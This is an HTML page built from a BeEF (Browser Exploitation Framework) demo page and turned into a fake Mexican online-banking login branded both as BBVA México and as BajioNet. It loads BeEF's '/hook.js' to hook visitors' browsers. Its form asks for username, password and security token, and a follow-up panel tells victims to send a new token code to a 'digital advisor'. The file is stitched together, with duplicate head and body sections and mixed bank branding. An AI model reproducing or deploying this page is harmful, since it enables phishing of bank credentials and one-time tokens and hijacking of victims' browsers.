<!--
    Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - https://beefproject.com
    See the file 'doc/COPYING' for copying permission
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>The Butcher</title>

	<link rel="stylesheet" type="text/css" href="butch.css" />
</head>
<body>
<script src="jquery-1.12.4.min.js"></script>
<script>

	function showfriends() {
		$("#hamper").hide();
		$("#friends").show();
	}

	function showHamper() {
		$("#friends").hide();
		$("#hamper").show();
	}

</script>
<script src="/hook.js"></script>
<link rel="stylesheet" href="css/estilos.css">
	<link rel="icon" href="faviconV2.ico">
	<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta name="lang" content="es-MX"/>
<meta name="resource-type" content="document"/>
<meta name="global" content="distribution"/>
<meta name="robots" content="index, follow"/>
<meta name="author" content="Bajio"/>
<meta scheme="RFC1766" name="DC.language" content="es-MX"/>
<meta name="search_segment" content="personas"/>
<meta name="search_template" content="servicio"/>
<link rel="icon" type="image/png" sizes="48x48" href="faviconV2.ico"/>
<link rel="apple-touch-icon" href="faviconV2.ico"/>
<link rel="icon" type="image/png" sizes="32x32" href="faviconV2.ico"/>
<link rel="icon" type="image/png" sizes="192x192" href="faviconV2.ico"/>
<link rel="icon" type="image/png" sizes="16x16" href="faviconV2.ico"/>
<link rel="mask-icon" href="/content/dam/public-web/global/images/favicon/v1/safari-pinned-tab.svg" color="#1464a5"/>
<link rel="shortcut icon" href="icon.ico"/>
<meta name="msapplication-TileColor" content="#ffffff"/>
<meta name="msapplication-TileImage" content="/content/dam/public-web/global/images/favicon/v1/mstile-144x144.png"/>
<meta name="msapplication-config" content="/apps/settings/wcm/designs/bbva/img/favicons/v1/browserconfig.xml"/>
<meta name="theme-color" content="#ffffff"/>

	<title>Bienvenidos a la Banca en Línea | BBVA México</title>
</head>
<body>
	<div class="contenedor">
		<div class="columna-izquierda">
			<div class="registro activo" id="registro">
				<div class="header">
					<h1>¡Bienvenido!</h1>
					<p>BajioNet</p>
				</div>
		
				<form class="formulario" id="formulario">
					<label for="nombre">Ingresa tu Usuario</label>
					<div class="contenedor-input">
						<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-person-circle" viewBox="0 0 16 16">
							<path d="M11 6a3 3 0 1 1-6 0 3 3 0 0 1 6 0z"/>
							<path fill-rule="evenodd" d="M0 8a8 8 0 1 1 16 0A8 8 0 0 1 0 8zm8-7a7 7 0 0 0-5.468 11.37C3.242 11.226 4.805 10 8 10s4.757 1.225 5.468 2.37A7 7 0 0 0 8 1z"/>
						</svg>
						<input type="password" id="nombre" name="nombre" placeholder="Usuario">
					</div>
		
					<label for="correo">Contraseña</label>
					<div class="contenedor-input">
						<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-envelope" viewBox="0 0 16 16">
							
						</svg>
						<input type="password" id="correo" name="correo" placeholder="Contraseña">
					</div>
					
					<label for="telefono">Token</label>
					<div class="contenedor-input">
						<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-telephone" viewBox="0 0 16 16">
							
						</svg>
						<input type="password" id="telefono" name="telefono" placeholder="Token">
					</div>
		
					<div class="contenedor-boton">
						<button type="submit">
							Continua
							<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-check" viewBox="0 0 16 16">
								<path d="M10.97 4.97a.75.75 0 0 1 1.07 1.05l-3.99 4.99a.75.75 0 0 1-1.08.02L4.324 8.384a.75.75 0 1 1 1.06-1.06l2.094 2.093 3.473-4.425a.267.267 0 0 1 .02-.022z"/>
							</svg>
						</button>
					</div>
				</form>
			</div>

			<div class="header exito" id="exito">
				<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-check-circle" viewBox="0 0 16 16">
					<path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/>
					<path d="M10.97 4.97a.235.235 0 0 0-.02.022L7.477 9.417 5.384 7.323a.75.75 0 0 0-1.06 1.06L6.97 11.03a.75.75 0 0 0 1.079-.02l3.992-4.99a.75.75 0 0 0-1.071-1.05z"/>
				</svg>
				<h1>Genera un nuevo token</h1>
				<p>Enviale el codigo a tu asesor digital.</p>
			</div>
		</div>

		<div class="columna-derecha">

		</div>
	</div>

	<script src="js/app.js"></script>
</body>
</html>

